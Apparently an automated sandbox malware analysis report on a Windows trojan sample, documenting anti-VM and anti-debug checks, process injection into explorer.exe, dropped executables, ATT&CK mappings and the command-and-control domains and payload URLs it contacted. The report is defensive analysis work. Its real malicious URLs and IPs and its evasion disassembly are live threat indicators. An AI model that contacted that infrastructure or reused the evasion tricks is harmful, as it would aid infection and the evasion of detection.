                Source: C:\Users\user\AppData\Local\Temp\5AF.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000004426EB0 second address: 000000000442778E instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-0Ch], edx 0x00000005 mov dword ptr [ebp-24h], 0000000Dh 0x0000000c mov eax, 00000001h 0x00000011 cmp eax, 00000000h 0x00000014 jnbe 00007F9AF0396623h 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 sub eax, dword ptr [ebp-04h] 0x0000001c cmp eax, dword ptr [ebp-24h] 0x0000001f jnl 00007F9AF039662Ah 0x00000021 inc dword ptr [ebp-14h] 0x00000024 jmp 00007F9AF0396C90h 0x00000029 mov eax, 00000000h 0x0000002e cmp eax, 00000000h 0x00000031 je 00007F9AF0396623h 0x00000033 cmp dword ptr [ebp-14h], 02h 0x00000037 jng 00007F9AF039685Ah 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\dfhwravKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\explorer.exe TID: 644Thread sleep count: 652 > 30
                Source: C:\Windows\explorer.exe TID: 5544Thread sleep count: 1177 > 30
                Source: C:\Windows\explorer.exe TID: 5544Thread sleep time: -117700s >= -30000s
                Source: C:\Windows\explorer.exe TID: 1104Thread sleep count: 1303 > 30
                Source: C:\Windows\explorer.exe TID: 1104Thread sleep time: -130300s >= -30000s
                Source: C:\Windows\explorer.exe TID: 1320Thread sleep count: 487 > 30
                Source: C:\Windows\explorer.exe TID: 1276Thread sleep count: 1102 > 30
                Source: C:\Windows\explorer.exe TID: 1276Thread sleep time: -110200s >= -30000s
                Source: C:\Windows\explorer.exe TID: 1332Thread sleep count: 1135 > 30
                Source: C:\Windows\explorer.exe TID: 1332Thread sleep time: -113500s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\5AF.exe TID: 2588Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeThread delayed: delay time: 600000
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 652
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1177
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1303
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 487
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1102
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1135
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeFile opened: PHYSICALDRIVE0
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0040D450 FindFirstFileW,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_004235B0 FindFirstFileW,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0040CE84 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeThread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: WerFault.exe, 00000013.00000002.551745803.0000000004738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh$
                Source: explorer.exe, 00000001.00000000.294130406.00000000045B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.336477540.00000000081DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
                Source: explorer.exe, 00000001.00000000.298060433.0000000006710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                Source: WerFault.exe, 00000013.00000003.544336242.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000002.555779726.0000000004B08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000001.00000000.303121165.0000000008304000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: 5AF.exe, 00000016.00000002.541764212.0000000002B75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K,<=;;?9:VMcI;8
                Source: explorer.exe, 00000001.00000000.268546487.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: explorer.exe, 00000001.00000000.268287568.0000000008200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\dfhwravSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0207092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02070D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D0D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006FC2CB push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_025CA0A3 push dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\dfhwravProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402709 LdrLoadDll,

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: dfhwrav.1.drJump to dropped file
                Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
                Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80
                Source: C:\Windows\explorer.exeDomain query: dowe.at
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\dfhwravSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\dfhwravSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 4E619E0
                Source: C:\Users\user\AppData\Roaming\dfhwravThread created: unknown EIP: 4FD19E0
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0087C50C InitializeSecurityDescriptor,InitializeAcl,CreateWellKnownSid,CreateWellKnownSid,AddAccessAllowedAce,SetSecurityDescriptorDacl,
                Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.292482159.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
                Source: explorer.exe, 00000001.00000000.298015850.0000000005D90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.268820967.000000000833A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.322936915.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258688322.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.292482159.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: ADCA.exe, 0000000A.00000003.437793710.000000007F700000.00000004.00001000.00020000.00000000.sdmp, ADCA.exe, 0000000A.00000003.450202572.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000000.455797744.0000000004041000.00000020.00000001.01000000.00000009.sdmpBinary or memory string: MSASCui.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts11
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                Input Capture
                1
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium11
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Exploitation for Client Execution
                Boot or Logon Initialization Scripts312
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory123
                System Information Discovery
                Remote Desktop Protocol1
                Input Capture
                Exfiltration Over Bluetooth21
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)22
                Software Packing
                NTDS331
                Security Software Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer124
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets141
                Virtualization/Sandbox Evasion
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                File Deletion
                Cached Domain Credentials3
                Process Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job141
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)312
                Process Injection
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                Hidden Files and Directories
                Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                Rundll32
                Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 756294 Sample: file.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 4 other signatures 2->56 9 file.exe 2->9         started        12 dfhwrav 2->12         started        14 5AF.exe 2->14         started        process3 signatures4 72 Detected unpacking (changes PE section rights) 9->72 74 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->74 76 Maps a DLL or memory area into another process 9->76 16 explorer.exe 6 9->16 injected 78 Machine Learning detection for dropped file 12->78 80 Checks if the current machine is a virtual machine (disk enumeration) 12->80 82 Creates a thread in another existing process (thread injection) 12->82 process5 dnsIp6 44 123.253.32.170, 49725, 80 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi Malaysia 16->44 46 thepokeway.nl 5.135.247.111, 443, 49739 OVHFR France 16->46 48 5 other IPs or domains 16->48 34 C:\Users\user\AppData\Roaming\dfhwrav, PE32 16->34 dropped 36 C:\Users\user\AppData\Local\Temp\ADCA.exe, PE32 16->36 dropped 38 C:\Users\user\AppData\Local\Temp\5AF.exe, PE32 16->38 dropped 40 C:\Users\user\...\dfhwrav:Zone.Identifier, ASCII 16->40 dropped 58 System process connects to network (likely due to code injection or exploit) 16->58 60 Benign windows process drops PE files 16->60 62 Deletes itself after installation 16->62 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->64 21 ADCA.exe 1 16->21         started        25 5AF.exe 16->25         started        file7 signatures8 process9 file10 42 C:\Users\user\AppData\...\Serpodtudpwhhta.dll, PE32 21->42 dropped 66 Detected unpacking (changes PE section rights) 21->66 68 Detected unpacking (overwrites its own PE header) 21->68 70 Machine Learning detection for dropped file 21->70 27 rundll32.exe 21->27         started        signatures11 process12 signatures13 84 Tries to detect virtualization through RDTSC time measurements 27->84 30 WerFault.exe 3 10 27->30         started        32 WerFault.exe 27->32         started        process14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe34%VirustotalBrowse
                file.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\dfhwrav100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\ADCA.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\5AF.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLinkDownload
                0.3.file.exe.2080000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.dfhwrav.6d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                22.2.5AF.exe.23be12c.2.unpack100%AviraTR/Patched.Ren.Gen7Download File
                0.2.file.exe.2070e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.2.dfhwrav.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                9.3.dfhwrav.2080000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                16.2.5AF.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                22.2.5AF.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                SourceDetectionScannerLabelLink
                thepokeway.nl5%VirustotalBrowse
                dowe.at0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://piratia.su/tmp/100%URL Reputationmalware
                http://piratia.su/tmp/100%URL Reputationmalware
                https://thepokeway.nl/upload/index.php0%URL Reputationsafe
                http://cracker.biz/tmp/0%URL Reputationsafe
                http://cracker.biz/tmp/0%URL Reputationsafe
                http://123.253.32.170/root2.exe0%URL Reputationsafe
                http://newhorizonswv.com/tmp/1%VirustotalBrowse
                http://xisac.com/tmp/1%VirustotalBrowse
                http://dowe.at/tmp/0%Avira URL Cloudsafe
                http://xisac.com/tmp/0%Avira URL Cloudsafe
                http://newhorizonswv.com/tmp/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                thepokeway.nl
                5.135.247.111
                truetrueunknown
                dowe.at
                200.46.66.71
                truetrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://piratia.su/tmp/true
                • URL Reputation: malware
                • URL Reputation: malware
                unknown
                http://newhorizonswv.com/tmp/true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://thepokeway.nl/upload/index.phpfalse
                • URL Reputation: safe
                unknown
                http://cracker.biz/tmp/true
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://123.253.32.170/root2.exetrue
                • URL Reputation: safe
                unknown
                http://piratia-life.ru/tmp/false
                  high
                  http://dowe.at/tmp/true
                  • Avira URL Cloud: safe
                  unknown
                  http://xisac.com/tmp/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.338958128.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322078451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.303824435.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.269421946.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.258393076.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    5.135.247.111
                    thepokeway.nlFrance
                    16276OVHFRtrue
                    201.124.230.1
                    unknownMexico
                    8151UninetSAdeCVMXfalse
                    123.253.32.170
                    unknownMalaysia
                    9924TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvitrue
                    211.59.14.90
                    unknownKorea Republic of
                    9318SKB-ASSKBroadbandCoLtdKRfalse
                    200.46.66.71
                    dowe.atPanama
                    18809CableOndaPAtrue
                    187.212.179.75
                    unknownMexico
                    8151UninetSAdeCVMXfalse
                    IP
                    192.168.2.1
                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:756294
                    Start date and time:2022-11-30 00:09:06 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 13m 15s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:file.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:23
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:2
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winEXE@13/9@36/7
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 22.1% (good quality ratio 11.6%)
                    • Quality average: 30.8%
                    • Quality standard deviation: 33.9%
                    HCA Information:
                    • Successful, ratio: 67%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240s for rundll32
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • HTTP Packets have been reduced
                    • TCP Packets have been reduced to 100
                    • Excluded IPs from analysis (whitelisted): 20.189.173.21
